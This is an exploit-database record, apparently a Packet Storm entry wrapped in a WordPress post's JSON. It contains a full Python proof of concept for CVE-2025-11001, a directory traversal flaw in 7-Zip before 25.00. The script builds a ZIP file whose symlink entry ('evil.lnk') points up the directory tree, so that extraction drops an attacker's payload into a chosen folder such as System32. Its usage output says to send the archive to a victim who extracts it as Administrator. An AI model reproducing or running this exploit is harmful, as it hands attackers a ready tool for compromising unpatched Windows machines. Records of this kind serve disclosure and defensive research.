{“lastseen”:”2026-04-10T17:15:34″,”description”:”7-Zip versions prior to 25.00 directory traversal to code execution exploit via malicious zip file…”,”published”:”2026-04-10T00:00:00″,”modified”:”2026-04-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 7-Zip Directory Traversal \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:218666″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-11001″],”sourceData”:”# Exploit Title: 7-Zip \\u003c 25.00 – Directory Traversal to RCE via Malicious ZIP \\n # Date: 2025-11-22\\n # Author: Mohammed Idrees Banyamer\\n # Author Country: Jordan\\n # Instagram: @banyamer_security\\n # GitHub: https:\/\/github.com\/mbanyamer\\n # Vendor Homepage: https:\/\/www.7-zip.org\\n # Software Link: https:\/\/www.7-zip.org\/download.html\\n # Version: 7-Zip \\u003c 25.00\\n # Tested on: Windows 10 \/ Windows 11 (7-Zip 24.xx)\\n # CVE: CVE-2025-11001\\n # CVSS: 8.8 (High) – draft estimation\\n # Category: Local Privilege Escalation \/ Remote Code Execution\\n # Platform: Windows\\n # CRITICAL: Yes – Public exploit available, active exploitation reported\\n # Including: Directory Traversal via crafted symlink entry in ZIP archive\\n # Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator\\n # Fix: Upgrade to 7-Zip 25.00 or later\\n # Advisory: https:\/\/www.7-zip.org\/history.txt\\n # Patch: https:\/\/github.com\/ip7z\/7zip\/releases\/tag\/25.00\\n # Target: Windows systems running vulnerable 7-Zip versions\\n \\n import struct\\n import os\\n import argparse\\n import sys\\n \\n def build_zip(target_path, payload_file, output_zip):\\n if not os.path.isfile(payload_file):\\n print(f\\”[-] Payload file not found: {payload_file}\\”)\\n sys.exit(1)\\n \\n payload_name = os.path.basename(payload_file)\\n payload_data = open(payload_file, \\”rb\\”).read()\\n \\n target = target_path.replace(\\”\\\\\\\\\\”, \\”\/\\”).strip(\\”\/\\”) + \\”\/\\”\\n traversal = \\”..\/..\/..\/..\/\\” + target\\n \\n with open(output_zip, \\”wb\\”) as f:\\n offset = 0\\n \\n symlink_name = \\”evil.lnk\\”\\n symlink_target = traversal.encode() + b\\”\\\\x00\\”\\n symlink_extra = struct.pack(\\”\\u003cHH\\”, 0x756e, len(symlink_target)) + symlink_target\\n \\n symlink_header = struct.pack(\\”\\u003cIHHHHHHIIIHH\\”,\\n 0x04034b50, 20, 0x800, 0x800, 0, 0, 0,\\n 0, 0, 0,\\n len(symlink_name), len(symlink_extra))\\n \\n f.write(symlink_header)\\n f.write(symlink_name.encode())\\n f.write(symlink_extra)\\n f.write(b\\”\\”)\\n symlink_central_offset = offset\\n offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)\\n \\n payload_header = struct.pack(\\”\\u003cIHHHHHHIIIHH\\”,\\n 0x04034b50, 20, 0x800, 0, 0, 0,\\n 0, len(payload_data), len(payload_data),\\n len(payload_name), 0)\\n \\n f.write(payload_header)\\n f.write(payload_name.encode())\\n f.write(payload_data)\\n payload_central_offset = offset\\n offset += len(payload_header) + len(payload_name) + len(payload_data)\\n \\n cd_offset = offset\\n \\n f.write(struct.pack(\\”\\u003cIHHHHHHIIIHHHHHII\\”,\\n 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,\\n 0, 0, 0,\\n len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 \\u003c\\u003c 16 | 0xA1ED, symlink_central_offset))\\n f.write(symlink_name.encode())\\n f.write(symlink_extra)\\n \\n f.write(struct.pack(\\”\\u003cIHHHHHHIIIHHHHHII\\”,\\n 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,\\n 0, len(payload_data), len(payload_data),\\n len(payload_name), 0, 0, 0, 0, 0o777 \\u003c\\u003c 16, payload_central_offset))\\n f.write(payload_name.encode())\\n \\n f.write(struct.pack(\\”\\u003cIHHHHIIH\\”,\\n 0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))\\n \\n print(f\\”[+] Malicious archive created: {output_zip}\\”)\\n print(f\\”[+] Target path : {target_path}\\”)\\n print(f\\”[+] Payload file : {payload_name} ({len(payload_data)} bytes)\\”)\\n print(f\\”[+] Final write location : {target_path}\\\\\\\\{payload_name}\\”)\\n print(\\”\\\\n[*] Usage:\\”)\\n print(\\” 1. Send the ZIP file to the victim\\”)\\n print(\\” 2. Victim must run 7-Zip \\u003c 25.00 as Administrator\\”)\\n print(\\” 3. Victim opens and extracts the ZIP \u2192 payload dropped silently\\”)\\n print(\\” 4. Achievement unlocked\\”)\\n \\n if __name__ == \\”__main__\\”:\\n banner = \\”\\”\\”\\n CVE-2025-11001 – 7-Zip Directory Traversal PoC\\n Author: Mohammed Idrees Banyamer (@banyamer_security)\\n \\”\\”\\”\\n print(banner)\\n \\n parser = argparse.ArgumentParser(description=\\”CVE-2025-11001 Exploit – 7-Zip \\u003c 25.00\\”)\\n parser.add_argument(\\”-t\\”, \\”–target\\”, required=True, help=\\”Target directory (e.g. C:\\\\\\\\Windows\\\\\\\\System32)\\”)\\n parser.add_argument(\\”-p\\”, \\”–payload\\”, required=True, help=\\”Payload file to drop (e.g. C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\calc.exe)\\”)\\n parser.add_argument(\\”-o\\”, \\”–output\\”, default=\\”CVE-2025-11001-exploit.zip\\”, help=\\”Output ZIP filename (default: CVE-2025-11001-exploit.zip)\\”)\\n \\n args = parser.parse_args()\\n \\n build_zip(args.target, args.payload, args.output)”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218666″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:L\/AC:H\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”baseScore”:7,”baseSeverity”:”HIGH”,”attackVector”:”LOCAL”,”attackComplexity”:”HIGH”,”privilegesRequired”:”NONE”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/218666\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-10T17:15:34″,”description”:”7-Zip versions prior to 25.00 directory traversal to code execution exploit via malicious zip file…”,”published”:”2026-04-10T00:00:00″,”modified”:”2026-04-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 7-Zip Directory Traversal \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:218666″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-11001″],”sourceData”:”# Exploit Title: 7-Zip \\u003c…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-42358","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n